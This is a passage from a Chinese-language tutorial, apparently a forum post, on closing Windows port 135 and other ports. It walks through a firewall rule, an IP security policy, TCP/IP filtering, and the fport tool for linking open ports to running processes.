本地端口：从135到135（定义了要拦截的端口只为135端口）

对方端口：从0到0 （端口为0时为对方的任何端口）
TCP标志：SYN

当满足上面条件时：拦截
好了，一个IP规则制作完成~确定！


c.如图：把我们刚刚制作好的规则放到同类规则的最顶端
使用向上箭头直到不能再向上，并选上勾，然后保存（这一步忘记就白辛苦了|||）
其它端口的关闭设置方法类似，如要开放端口，把‘拦截’改为‘通行’就可以了。


方法2 自定义安全策略
如果我们手头暂时没有防火墙工具的话，那么可以利用Windows服务器自身的IP安全策略功能，来自定义一个拦截135端口的安全策略。

a.打开控制面板，找到管理工具里面的本地安全设置。

b.看到如图的界面，我们选择左边的IP安全策略，在本地机器。

然后在右边空白处单击右键，选择创建IP安全策略。出现了一个设置向导。点击下一步

名称也是看自己喜欢了，我们还是叫拦截135端口~下一步
去掉激活默认响应规则的勾，下一步

点击完成，我们就创建好了，接下来设置我们用这个规则来干什么，我们是拦截135端口所以添加一个IP安全规则，单击添加（不需要向导所以去掉添加向导的勾）

在IP筛选器列表中，我们添加一个新的。单击添加...
在这个对话框中名称还是自定义，去掉添加向导的勾，然后单击添加...

准备开始设置规则了：）
在寻址标签中，设置：
源地址：任何IP地址
目标地址：我的IP地址


在协议标签中，设置：
选择协议类型：TCP
设置IP协议端口:

从任意端口，到此端口：135

确定后可以看到筛选器中多出了一

条。关闭后在IP筛选器列表中选择我们刚刚建立的拦截135端口。
我们建立好了可是电脑还不知道我们要怎么使用这个规则，不要紧，只要在筛选器操作标签中添加一个操作就完成了~

单击添加...只用在安全措施种选择阻止就ok了（可以在描述中设置名称）
同样选上这个操作。确定后我们就完成了99%！

由于windows默认IP安全策略中的项目是没有激活的，所以我们要指派一下，点击指派。完成99.9%
重新启动！100%
其它的端口设置类似，多试试看~

PS:如果没有IP安全策略可以在控制台中新建
在运行中输入：mmc回车
然后在控制台按钮中选择添加删除管理单元

然后单击添加...

在其中选择：IP安全策略，再添加即可，这时的操作就和上面一样了。
方法 3 筛选TCP端口

我们还可以利用Windows系统的筛选TCP端口功能，将来自于135网络端口的数据包，全部过滤掉。
先打开“Internet协议(TCP/IP)”属性设置对话框
可以在控制面板中的网络连接找到本地连接，打开，点击属性。

选择TCP/IP协议，再单击属性
在右下脚找到高级，单击进入后找到选项标签，选择其中的TCP/IP筛选，进入属性
选中启用TCP/IP筛选选项，同时在TCP端口处，选中只允许，并单击添加按钮，填入常用的21，23，80，110端口，最后单击确定按钮，这样的话其余端口就会被自动排除了。
以后如果要添加或者删除都可以同样操作。
方法 4 使用fport工具

如果我们知道什么程序使用了什么端口，再找到那个程序将它关闭不是也可以达到要求吗？还可能找到可疑的进程~

这里我们使用一款小巧的工具，fport
Fport工具可以把本机开放的TCP/UDP端口同应用程序关联起来，这和使用'netstat -an'命令产生的效果类似，但是该软件还可以把端口和运行着的进程关联起来，并可以显示进程PID，名称和路径。该软件可以用于将未知的端口同应用程序关联起来。

我把软件上传上来就不用大家去找了~
例如：我把软件解压后放在了D盘的根目录下，路径就为：D:\Fport

现在我们打开命令提示符窗口：在开始中选择运行，输入cmd，然后回车
在命令提示符窗口中输入：

d:
cd fport
fport 回车
马上即可看到很详细的端口使用情况了
如果找到可疑的程序，就在任务管理器中将其关闭。然后利用优化大师或者超级兔子之类的优化软件禁止他开机自动运行